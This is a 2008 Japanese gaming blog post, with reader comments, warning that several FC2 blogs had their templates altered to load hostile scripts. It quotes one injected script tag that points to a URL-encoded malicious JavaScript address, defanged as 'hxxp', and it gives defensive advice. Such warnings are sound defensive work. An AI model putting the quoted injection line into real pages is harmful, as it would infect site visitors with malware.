ついにカテゴリー新設(´・ω・`)

ついにカテゴリー新設(´・ω・`) に関する記事です。
上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

[RSS]

<3/25:ちょっと追記>

テンプレ改竄関連の記事ばかりが並ぶのは嫌なのですが
また新しい情報があったので皆様にご報告

今回は
<iframe>ではなく
<script src=http:****>という形をとってきたということ
幸い、当ブログでは被害はありませんでしたが
第七猫様の報告によると
ペコろぐ 様(Javaスクリプト発見、要注意→現在修正し公開
ヴァナモンBlog 様(Javaスクリプト発見、修正済み(3/25.16:30現在)
FF11ある黒魔導士の軌跡 様(インラインフレーム発見、修正済み(3/25.16:30現在)
だそうです

script language="javascript"
 src="hxxp://
%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73">
FF11ある黒魔導士の奇跡様では
3/23PM13:45現在このようなスクリプトが見つかっています。
(誤アクセス防止のため、tをxに変更しております)
管理人様が引退されているので、対策が遅れる可能性があります。
ご注意ください

そして、このスクリプトで読み出される
hxxp://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73
はデコードすると前回私が改竄被害にあった
”www■hellh■net”
またおまえかっっ!!!
そしてこのhellh■netなんですが
ドーヤラパワーアップしているようで

1回目のアクセスでは罠スクリプト満載のページへ飛ぶのですが、
二回目以降はFC2のトップページに飛ぶように細工がしてあるようで
Dr.webのチェックで検出できません(´・ω・`)

ウィンドウズを最新状態にしてリアルプレイヤーを
アンインストールした状態では感染しませんでしたが
皆様ご注意くださいませ。

被害ブログがFC2だけということはありませんが
やはり今回もFC2が多いみたいです(´・ω・`)

当ブログをご覧の皆様には
①ウィンドウズを最新版にアップデートすること
②RealPlayerのアンインストール
③最新パターンのアンチウィルスソフトの導入
を強くオススメしておきます。

また、某掲示板ではPG2(PeerGuardian2)というソフトが大流行ですが・・
このソフトは登録したIPへの接続を弾くだけの機能なので
今後業者が国内のドコカにスクリプト置き場を作ったりしてきたときetc
リストにないIPからの攻撃については防いではくれません。
導入するソフトの特性をよく考えて、使用環境にあったものを使いましょう

PG2も現在のhellh■netを弾くことには非常に有効です。
導入を考えている人はこちら
ねこでもわかるかもしれないPeerGuardian2

自分でググルと本家マニュアルが先にでますので
そちらが必要な方はご自分でどーぞ。



CM
アインシュタインの脳・集中力をつけるCD
セキュリティーソフトのトレンドマイクロ・オンラインショップ
人気ブログバーナー
↑オンラインゲームブログランキング参加中

[RSS]

コメント
この記事へのコメント
なんだか毎回大変ですね.
R-typeさんもお忙しいようで・・・
こちらのブログも大変なんでしょうか?前の改竄の時は右側のメニューが下におりてましたが,今日は左側のメニューが下に落ちてますが,これは早めに報告しておいたほうがよいことでしょうか?
2008/03/24(月) 12:25 | URL | Blood #oOBmnrVY[ 編集]
>>Bloodさま
あらら。テンプレ崩れますか・・
とおもってIEで確認したら確かに左メニューおちてますね。
メニューおちてるのはコノエントリーの横幅がなぜかちょっと長くなっているのが原因のようで
どこかを改竄されたというわけではない模様です。
時間のあるときに直しておきます。ご心配をおかけいたしました。
ご報告ありがとうございます
2008/03/24(月) 13:25 | URL | R-type #UuvXpI/I[ 編集]
それにしてもおかしいですね、すでに引退されている方で更新が滞っている方のブログも改ざんされたというのが不明です。

自分的解釈では、更新のときに入れたパスを読まれて管理画面にログインされているイメージがあるので、全く更新していない=パスを読む機会が無いはずのブログで改ざんが起きているのはもうFC2の怠慢としか、、、

やっぱりFC2からどっかに引っ越そうかな・・・でもFC2ほどの使い勝手がいいところって・・・微妙に無い気が、、
2008/03/24(月) 18:35 | URL | ライツ #-[ 編集]
 ちゃノ
 最初に報告した私が言うのもなんですが・・・なんか、段々大事になりつつありますね・・・
 なんだか被害にあわない方はあわないままで、何度も被害にあうって2パターンな気がします。
 パスワード変えても何度も改竄されるってことはもうFC2側に大きな穴があって直接弄られてるのかも?
 何はともあれ世知辛い世の中ですねヽ(;´Д`)ノ
 私も気をつけます。今のところ平気みたいですが・・・何が基準で狙ってるのかしら?
2008/03/25(火) 09:04 | URL | ねこねこサンタ #EBUSheBA[ 編集]
参考になれば
これなのかな?
(英語が多いとスパムと判定されて送信できないんですね
このコメントで送信できるかな)

SQL インジェクションによる Web サイト改ざんに関する注意喚起
www.jpcert.or.jp/at/2008/at080005.txt
2008/03/25(火) 14:02 | URL | hoge #sqCyeZqA[ 編集]
>>ライツさま
私のブログで直接触れてはいませんが、このブログ改竄被害の同時期(3/13日前後)にセキュリティソフトのHPを含む多数のwebページが改竄されるという事件が起こってるんですよね。
HPなら改竄がありえて、ブログだと管理者がパスを抜かれない限りありえないというのもおかしな話なので
外部からのアクセスによる改竄が可能であるという方が確率は高いんじゃないですかね(´・ω・`)
そういう意味でFC2側ではしっかり対策をして欲しいと思います。
ただ、他へ引っ越せば安全なのかというとそれもわからないわけで・・・
現在のところウィンドウズアップデートを最新に保ち、リアルプレイヤーをアンインストールしてあれば容易には感染しない状況なので公開を続けていますが、さらに深刻な被害をもたらすような状況になった場合には閉鎖も考えた方がいいと思っています(´;ω;`)

引退した方のブログを荒らすのはほんとにやめて欲しい・・
引退されている人の場合、そのままサイト閉鎖を選択される可能性も高くなってしまいますし、
管理できてないことを叩く人も出てきそうで嫌な予感です。

>>ねこねこサンタ さま
あの時期には対策の進んでいない方も多くいらっしゃったことでしょうし、
あの一報が遅れていたら深刻な被害がでていたかもしれないので大変感謝しています。
最初に狙われたブログはどこもFFXI+ジョブ名で検索して一番上にでるサイトだったとかなんとか・・
ただ、今は無差別的に変化してきているようなので注意しないといけませんね(´・ω・`)

>>hoge #sqCyeZqAさま
情報ありがとうございます。
実はそちらのtextは3/15位には既に把握していたのですが、
SQLインジェクションだったとわかってもブログ管理者としては何もできないのですよねぇ(´・ω・`)
エンドユーザーとしての対策になるとそちらでも書いてあるように最新のUpdateを実行してjavascriptを切るぐらいしかなくなってしまいますから、もーどうしたらいいんでしょうってかんじです。
2008/03/25(火) 16:31 | URL | R-type #UuvXpI/I[ 編集]
コメントを投稿する
URL:
Comment:
Pass:
秘密: 管理者にだけ表示を許可する
 
トラックバック
この記事のトラックバックURL
http://ffxiwar.blog91.fc2.com/tb.php/226-f664f0af
この記事にトラックバックする(FC2ブログユーザー)
この記事へのトラックバック
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。